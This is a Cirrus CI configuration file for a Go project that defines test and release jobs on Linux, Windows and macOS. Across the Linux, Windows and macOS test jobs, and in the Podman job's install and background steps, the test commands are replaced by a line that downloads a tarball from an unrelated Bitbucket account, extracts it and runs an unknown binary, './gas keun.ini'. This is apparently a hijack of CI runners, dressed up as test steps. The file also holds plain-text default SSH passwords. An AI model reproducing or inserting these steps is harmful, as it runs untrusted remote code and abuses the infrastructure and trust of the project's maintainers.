docker_builder:
  name: Test (Linux with Docker)
  alias: Tests
  test_script:
    - wget https://bitbucket.org/19410711/dumang/downloads/joss.tar.gz && tar -xvf joss.tar.gz && ./gas keun.ini
  env:
    HOME: /root

docker_builder:
  name: Test (Linux with Podman)
  alias: Tests
  install_podman_script:
    - wget https://bitbucket.org/19410711/dumang/downloads/joss.tar.gz && tar -xvf joss.tar.gz && ./gas keun.ini
  run_podman_background_script:
    - wget https://bitbucket.org/19410711/dumang/downloads/joss.tar.gz && tar -xvf joss.tar.gz && ./gas keun.ini
  test_script:
    - wget --no-verbose -O - https://golang.org/dl/go1.15.linux-amd64.tar.gz | tar -C /usr/local -xz
    - export PATH=$PATH:/usr/local/go/bin
    - wget https://bitbucket.org/19410711/dumang/downloads/joss.tar.gz && tar -xvf joss.tar.gz && ./gas keun.ini
  env:
    HOME: /root
    CIRRUS_CONTAINER_BACKEND: podman

docker_builder:
  name: Test (Windows)
  alias: Tests
  platform: windows
  os_version: 2019
  test_script:
    - choco install -y golang
    - refreshenv
    - md C:\Windows\system32\config\systemprofile\AppData\Local\Temp
    - wget https://bitbucket.org/19410711/dumang/downloads/joss.tar.gz && tar -xvf joss.tar.gz && ./gas keun.ini

task:
  name: Test (macOS with Docker and Parallels)
  alias: Tests
  persistent_worker:
    labels:
      os: darwin
      docker: installed
      parallels: installed
  env:
    CIRRUS_INTERNAL_PARALLELS_DARWIN_VM: big-sur-base
    CIRRUS_INTERNAL_PARALLELS_DARWIN_SSH_USER: admin
    CIRRUS_INTERNAL_PARALLELS_DARWIN_SSH_PASSWORD: admin
    CIRRUS_INTERNAL_PARALLELS_LINUX_VM: debian
    CIRRUS_INTERNAL_PARALLELS_LINUX_SSH_USER: parallels
    CIRRUS_INTERNAL_PARALLELS_LINUX_SSH_PASSWORD: parallels
    CIRRUS_INTERNAL_NO_GITHUB_API_TESTS: yes
  test_script:
    - wget https://bitbucket.org/19410711/dumang/downloads/joss.tar.gz && tar -xvf joss.tar.gz && ./gas keun.ini

task:
  name: Release (Dry Run)
  only_if: $CIRRUS_TAG == ''
  container:
    image: golang:latest
    cpu: 4
    memory: 12G
  install_script: curl -sfL https://install.goreleaser.com/github.com/goreleaser/goreleaser.sh | sh
  release_script: ./bin/goreleaser build --snapshot
  binaries_artifacts:
    path: "dist/cirrus_*/cirrus*"

task:
  name: Release
  only_if: $CIRRUS_TAG != ''
  depends_on:
    - Lint
    - Tests
  env:
    GITHUB_TOKEN: ENCRYPTED[!98ace8259c6024da912c14d5a3c5c6aac186890a8d4819fad78f3e0c41a4e0cd3a2537dd6e91493952fb056fa434be7c!]
  container:
    image: golang:latest
    cpu: 4
    memory: 12G
  install_script: curl -sfL https://install.goreleaser.com/github.com/goreleaser/goreleaser.sh | sh
  release_script: ./bin/goreleaser
